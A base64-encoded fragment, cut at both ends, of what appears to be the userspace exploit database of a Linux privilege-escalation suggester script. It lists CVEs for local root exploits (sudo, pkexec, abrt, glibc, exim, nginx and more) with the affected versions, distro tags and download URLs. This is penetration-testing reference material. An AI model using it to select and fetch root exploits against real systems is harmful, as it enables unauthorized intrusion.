0gUEFNIE1PVEQKUmVxczogcGtnPWxpYnBhbS1tb2R1bGVzLHZlcjw9MS4xLjEKVGFnczogdWJ1bnR1PTkuMTB8MTAuMDQKUmFuazogMQpleHBsb2l0LWRiOiAxNDMzOQpDb21tZW50czogU1NIIGFjY2VzcyB0byBub24gcHJpdmlsZWdlZCB1c2VyIGlzIG5lZWRlZApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MTcwXSR7dHh0cnN0fSBTeXN0ZW1UYXAKUmVxczogcGtnPXN5c3RlbXRhcCx2ZXI8PTEuMwpUYWdzOiBSSEVMPTV7c3lzdGVtdGFwOjEuMS0zLmVsNX0sZmVkb3JhPTEze3N5c3RlbXRhcDoxLjItMS5mYzEzfQpSYW5rOiAxCmF1dGhvcjogVGF2aXMgT3JtYW5keQpleHBsb2l0LWRiOiAxNTYyMApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMS0xNDg1XSR7dHh0cnN0fSBwa2V4ZWMKUmVxczogcGtnPXBvbGtpdCx2ZXI9MC45NgpUYWdzOiBSSEVMPTYsdWJ1bnR1PTEwLjA0fDEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTc5NDIKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTEtMjkyMV0ke3R4dHJzdH0ga3RzdXNzClJlcXM6IHBrZz1rdHN1c3MsdmVyPD0xLjQKVGFnczogc3Bhcmt5PTV8NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDExLzA4LzEzLzIKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTEtMjkyMS9rdHN1c3MtbHBlLnNoCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTA4MDldJHt0eHRyc3R9IGRlYXRoX3N0YXIgKHN1ZG8pClJlcXM6IHBrZz1zdWRvLHZlcj49MS44LjAsdmVyPD0xLjguMwpUYWdzOiBmZWRvcmE9MTYgClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL2Z1bGxkaXNjbG9zdXJlLzIwMTIvSmFuL2F0dC01OTAvYWR2aXNvcnlfc3Vkby50eHQKZXhwbG9pdC1kYjogMTg0MzYKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDQ3Nl0ke3R4dHJzdH0gY2hrcm9vdGtpdApSZXFzOiBwa2c9Y2hrcm9vdGtpdCx2ZXI8MC41MApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9zZWNsaXN0cy5vcmcvb3NzLXNlYy8yMDE0L3EyLzQzMApleHBsb2l0LWRiOiAzMzg5OQpDb21tZW50czogUm9vdGluZyBkZXBlbmRzIG9uIHRoZSBjcm9udGFiICh1cCB0byBvbmUgZGF5IG9mIGRlbGF5KQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC01MTE5XSR7dHh0cnN0fSBfX2djb252X3RyYW5zbGl0X2ZpbmQKUmVxczogcGtnPWdsaWJjfGxpYmM2LHg4NgpUYWdzOiBkZWJpYW49NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvbS8yMDE0LzA4L3RoZS1wb2lzb25lZC1udWwtYnl0ZS0yMDE0LWVkaXRpb24uaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGxhYi5jb20vZXhwbG9pdC1kYXRhYmFzZS9leHBsb2l0ZGItYmluLXNwbG9pdHMvLS9yYXcvbWFpbi9iaW4tc3Bsb2l0cy8zNDQyMS50YXIuZ3oKZXhwbG9pdC1kYjogMzQ0MjEKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTg2Ml0ke3R4dHJzdH0gbmV3cGlkIChhYnJ0KQpSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MjAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMzE1XSR7dHh0cnN0fSByYWNlYWJydApSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MTl7YWJydDoyLjEuNS0xLmZjMTl9LGZlZG9yYT0yMHthYnJ0OjIuMi4yLTIuZmMyMH0sZmVkb3JhPTIxe2FicnQ6Mi4zLjAtMy5mYzIxfSxSSEVMPTd7YWJydDoyLjEuMTEtMTIuZWw3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvMTMwCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vdGF2aXNvL2ZlMzU5MDA2ODM2ZDZjZDEwOTFlL3Jhdy8zMmZlODQ4MWM0MzRmOGNhZDViY2Y4NTI5Nzg5MjMxNjI3ZTUwNzRjL3JhY2VhYnJ0LmMKZXhwbG9pdC1kYjogMzY3NDcKYXV0aG9yOiBUYXZpcyBPcm1hbmR5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTEzMThdJHt0eHRyc3R9IG5ld3BpZCAoYXBwb3J0KQpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xMzE4XSR7dHh0cnN0fSBuZXdwaWQgKGFwcG9ydCkgMgpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQuMgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL29wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8wNC8xNC80CmV4cGxvaXQtZGI6IDM2NzgyCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyMDJdJHt0eHRyc3R9IGZ1c2UgKGZ1c2VybW91bnQpClJlcXM6IHBrZz1mdXNlLHZlcjwyLjkuMwpUYWdzOiBkZWJpYW49Ny4wfDguMCx1YnVudHU9KgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvNTIwCmV4cGxvaXQtZGI6IDM3MDg5CkNvbW1lbnRzOiBOZWVkcyBjcm9uIG9yIHN5c3RlbSBhZG1pbiBpbnRlcmFjdGlvbgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xODE1XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdApSZXFzOiBwa2c9c2V0cm91Ymxlc2hvb3QsdmVyPDMuMi4yMgpUYWdzOiBmZWRvcmE9MjEKUmFuazogMQpleHBsb2l0LWRiOiAzNjU2NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMjQ2XSR7dHh0cnN0fSB1c2VyaGVscGVyClJlcXM6IHBrZz1saWJ1c2VyLHZlcjw9MC42MApUYWdzOiBSSEVMPTZ7bGlidXNlcjowLjU2LjEzLSg0fDUpLmVsNn0sUkhFTD02e2xpYnVzZXI6MC42MC01LmVsN30sZmVkb3JhPTEzfDE5fDIwfDIxfDIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTUvMDcvMjMvY3ZlLTIwMTUtMzI0NS1jdmUtMjAxNS0zMjQ2L2N2ZS0yMDE1LTMyNDUtY3ZlLTIwMTUtMzI0Ni50eHQgCmV4cGxvaXQtZGI6IDM3NzA2CkNvbW1lbnRzOiBSSEVMIDUgaXMgYWxzbyB2dWxuZXJhYmxlLCBidXQgaW5zdGFsbGVkIHZlcnNpb24gb2YgZ2xpYmMgKDIuNSkgbGFja3MgZnVuY3Rpb25zIG5lZWRlZCBieSByb290aGVscGVyLmMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtNTI4N10ke3R4dHJzdH0gYWJydC9zb3NyZXBvcnQtcmhlbDcKUmVxczogcGtnPWFicnQsY21kOmdyZXAgLXFpIGFicnQgL3Byb2Mvc3lzL2tlcm5lbC9jb3JlX3BhdHRlcm4KVGFnczogUkhFTD03e2FicnQ6Mi4xLjExLTEyLmVsN30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xCnNyYy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xLzEKZXhwbG9pdC1kYjogMzg4MzIKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS02NTY1XSR7dHh0cnN0fSBub3RfYW5fc3NobnVrZQpSZXFzOiBwa2c9b3BlbnNzaC1zZXJ2ZXIsdmVyPj02LjgsdmVyPD02LjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI2LzIKZXhwbG9pdC1kYjogNDExNzMKYXV0aG9yOiBGZWRlcmljbyBCZW50bwpDb21tZW50czogTmVlZHMgYWRtaW4gaW50ZXJhY3Rpb24gKHJvb3QgdXNlciBuZWVkcyB0byBsb2dpbiB2aWEgc3NoIHRvIHRyaWdnZXIgZXhwbG9pdGF0aW9uKQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjEyXSR7dHh0cnN0fSBibHVlbWFuIHNldF9kaGNwX2hhbmRsZXIgZC1idXMgcHJpdmVzYwpSZXFzOiBwa2c9Ymx1ZW1hbix2ZXI8Mi4wLjMKVGFnczogZGViaWFuPTh7Ymx1ZW1hbjoxLjIzfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly90d2l0dGVyLmNvbS90aGVncnVncS9zdGF0dXMvNjc3ODA5NTI3ODgyODEzNDQwCmV4cGxvaXQtZGI6IDQ2MTg2CmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTEyNDBdJHt0eHRyc3R9IHRvbWNhdC1yb290cHJpdmVzYy1kZWIuc2gKUmVxczogcGtnPXRvbWNhdApUYWdzOiBkZWJpYW49OCx1YnVudHU9MTYuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL1RvbWNhdC1EZWJQa2dzLVJvb3QtUHJpdmlsZWdlLUVzY2FsYXRpb24tRXhwbG9pdC1DVkUtMjAxNi0xMjQwLmh0bWwKc3JjLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvdG9tY2F0LXJvb3Rwcml2ZXNjLWRlYi5zaApleHBsb2l0LWRiOiA0MDQ1MAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBBZmZlY3RzIG9ubHkgRGViaWFuLWJhc2VkIGRpc3Ryb3MKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMTI0N10ke3R4dHJzdH0gbmdpbnhlZC1yb290LnNoClJlcXM6IHBrZz1uZ2lueHxuZ2lueC1mdWxsLHZlcjwxLjEwLjMKVGFnczogZGViaWFuPTgsdWJ1bnR1PTE0LjA0fDE2LjA0fDE2LjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9OZ2lueC1FeHBsb2l0LURlYi1Sb290LVByaXZFc2MtQ1ZFLTIwMTYtMTI0Ny5odG1sCnNyYy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi0xMjQ3L25naW54ZWQtcm9vdC5zaApleHBsb2l0LWRiOiA0MDc2OAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBSb290aW5nIGRlcGVuZHMgb24gY3Jvbi5kYWlseSAodXAgdG8gMjRoIG9mIGRlbGF5KS4gQWZmZWN0ZWQ6IGRlYjg6IDwxLjYuMjsgMTQuMDQ6IDwxLjQuNjsgMTYuMDQ6IDEuMTAuMDsgZ2VudG9vOiA8MS4xMC4yLXIzCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTE1MzFdJHt0eHRyc3R9IHBlcmxfc3RhcnR1cCAoZXhpbSkKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTU0OQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0xNTMxXSR7dHh0cnN0fSBwZXJsX3N0YXJ0dXAgKGV4aW0pIDIKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTUzNQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00OTg5XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdCAyClJlcXM6IHBrZz1zZXRyb3VibGVzaG9vdApUYWdzOiBSSEVMPTZ8NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jLXNraWxscy5ibG9nc3BvdC5jb20vMjAxNi8wNi9sZXRzLWZlZWQtYXR0YWNrZXItaW5wdXQtdG8tc2gtYy10by1zZWUuaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vc3RlYWx0aC90cm91Ymxlc2hvb3Rlci9yYXcvbWFzdGVyL3N0cmFpZ2h0LXNob290ZXIuYwpleHBsb2l0LWRiOgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01NDI1XSR7dHh0cnN0fSB0b21jYXQtUkgtcm9vdC5zaApSZXFzOiBwa2c9dG9tY2F0ClRhZ3M6IFJIRUw9NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9Ub21jYXQtUmVkSGF0LVBrZ3MtUm9vdC1Qcml2RXNjLUV4cGxvaXQtQ1ZFLTIwMTYtNTQyNS5odG1sCnNyYy11cmw6IGh0dHA6Ly9sZWdhbGhhY2tlcnMuY29tL2V4cGxvaXRzL3RvbWNhdC1SSC1yb290LnNoCmV4cGxvaXQtZGI6IDQwNDg4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFmZmVjdHMgb25seSBSZWRIYXQtYmFzZWQgZGlzdHJvcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi02NjYzLENWRS0yMDE2LTY2NjR8Q1ZFLTIwMTYtNjY2Ml0ke3R4dHJzdH0gbXlzcWwtZXhwbG9pdC1jaGFpbgpSZXFzOiBwa2c9bXlzcWwtc2VydmVyfG1hcmlhZGItc2VydmVyLHZlcjw1LjUuNTIKVGFnczogdWJ1bnR1PTE2LjA0LjEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL015U1FMLU1hcmlhLVBlcmNvbmEtUHJpdkVzY1JhY2UtQ1ZFLTIwMTYtNjY2My01NjE2LUV4cGxvaXQuaHRtbApzcmMtdXJsOiBodHRwOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi02NjYzL215c3FsLXByaXZlc2MtcmFjZS5jCmV4cGxvaXQtZGI6IDQwNjc4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsc28gTWFyaWFEQiB2ZXI8MTAuMS4xOCBhbmQgdmVyPDEwLjAuMjggYWZmZWN0ZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtOTU2Nl0ke3R4dHJzdH0gbmFnaW9zLXJvb3QtcHJpdmVzYwpSZXFzOiBwa2c9bmFnaW9zLHZlcjw0LjIuNApUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9sZWdhbGhhY2tlcnMuY29tL2Fkdmlzb3JpZXMvTmFnaW9zLUV4cGxvaXQtUm9vdC1Qcml2RXNjLUNWRS0yMDE2LTk1NjYuaHRtbApzcmMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvQ1ZFLTIwMTYtOTU2Ni9uYWdpb3Mtcm9vdC1wcml2ZXNjLnNoCmV4cGxvaXQtZGI6IDQwOTIxCmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsbG93cyBwcml2IGVzY2FsYXRpb24gZnJvbSBuYWdpb3MgdXNlciBvciBuYWdpb3MgZ3JvdXAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMDM1OF0ke3R4dHJzdH0gbnRmcy0zZy1tb2Rwcm9iZQpSZXFzOiBwa2c9bnRmcy0zZyx2ZXI8MjAxNy40ClRhZ3M6IHVidW50dT0xNi4wNHtudGZzLTNnOjIwMTUuMy4xNEFSLjEtMWJ1aWxkMX0sZGViaWFuPTcuMHtudGZzLTNnOjIwMTIuMS4xNUFSLjUtMi4xK2RlYjd1Mn0sZGViaWFuPTguMHtudGZzLTNnOjIwMTQuMi4xNUFSLjItMStkZWI4dTJ9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2J1Z3MuY2hyb21pdW0ub3JnL3AvcHJvamVjdC16ZXJvL2lzc3Vlcy9kZXRhaWw/aWQ9MTA3MgpzcmMtdXJsOiBodHRwczovL2dpdGxhYi5jb20vZXhwbG9pdC1kYXRhYmFzZS9leHBsb2l0ZGItYmluLXNwbG9pdHMvLS9yYXcvbWFpbi9iaW4tc3Bsb2l0cy80MTM1Ni56aXAKZXhwbG9pdC1kYjogNDEzNTYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuIExpbnV4IGhlYWRlcnMgbXVzdCBiZSBpbnN0YWxsZWQuIFN5c3RlbSBtdXN0IGhhdmUgYXQgbGVhc3QgdHdvIENQVSBjb3Jlcy4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTg5OV0ke3R4dHJzdH0gcy1uYWlsLXByaXZnZXQKUmVxczogcGtnPXMtbmFpbCx2ZXI8MTQuOC4xNgpUYWdzOiB1YnVudHU9MTYuMDQsbWFuamFybz0xNi4xMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcKc3JjLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcvMQpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy01ODk5L2V4cGxvaXQuc2gKYXV0aG9yOiB3YXBpZmxhcGkgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBCcmVuZGFuIENvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2N10ke3R4dHJzdH0gU3Vkb2VyLXRvLXJvb3QKUmVxczogcGtnPXN1ZG8sdmVyPD0xLjguMjAsY21kOlsgLWYgL3Vzci9zYmluL2dldGVuZm9yY2UgXQpUYWdzOiBSSEVMPTd7c3VkbzoxLjguNnA3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc3Vkby53cy9hbGVydHMvbGludXhfdHR5Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA1LzMwL2N2ZS0yMDE3LTEwMDAzNjcvbGludXhfc3Vkb19jdmUtMjAxNy0xMDAwMzY3LmMKZXhwbG9pdC1kYjogNDIxODMKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IE5lZWRzIHRvIGJlIHN1ZG9lci4gV29ya3Mgb25seSBvbiBTRUxpbnV4IGVuYWJsZWQgc3lzdGVtcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzY3XSR7dHh0cnN0fSBzdWRvcHduClJlcXM6IHBrZz1zdWRvLHZlcjw9MS44LjIwLGNtZDpbIC1mIC91c3Ivc2Jpbi9nZXRlbmZvcmNlIF0KVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnN1ZG8ud3MvYWxlcnRzL2xpbnV4X3R0eS5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jMGQzejNyMC9zdWRvLUNWRS0yMDE3LTEwMDAzNjcvbWFzdGVyL3N1ZG9wd24uYwpleHBsb2l0LWRiOgphdXRob3I6IGMwZDN6M3IwCkNvbW1lbnRzOiBOZWVkcyB0byBiZSBzdWRvZXIuIFdvcmtzIG9ubHkgb24gU0VMaW51eCBlbmFibGVkIHN5c3RlbXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcwXSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDYvMTkvc3RhY2stY2xhc2gvc3RhY2stY2xhc2gudHh0CnNyYy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9saW51eF9sZHNvX2h3Y2FwLmMKZXhwbG9pdC1kYjogNDIyNzQKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IFVzZXMgIlN0YWNrIENsYXNoIiB0ZWNobmlxdWUsIHdvcmtzIGFnYWluc3QgbW9zdCBTVUlELXJvb3QgYmluYXJpZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcxXSR7dHh0cnN0fSBsaW51eF9sZHNvX2R5bmFtaWMKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczogZGViaWFuPTl8MTAsdWJ1bnR1PTE0LjA0LjV8MTYuMDQuMnwxNy4wNCxmZWRvcmE9MjN8MjR8MjUKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29fZHluYW1pYy5jCmV4cGxvaXQtZGI6IDQyMjc2CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOiBVc2VzICJTdGFjayBDbGFzaCIgdGVjaG5pcXVlLCB3b3JrcyBhZ2FpbnN0IG1vc3QgU1VJRC1yb290IFBJRXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwM